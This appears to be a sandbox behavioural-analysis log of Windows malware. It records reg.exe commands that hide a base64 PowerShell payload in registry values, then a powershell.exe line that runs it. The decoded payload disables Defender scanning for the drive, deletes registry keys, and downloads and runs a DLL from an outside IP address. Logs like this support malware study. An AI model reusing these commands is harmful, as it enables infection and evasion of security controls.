Behavioral Analysis

reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT

reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=

reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS

reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane | %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane"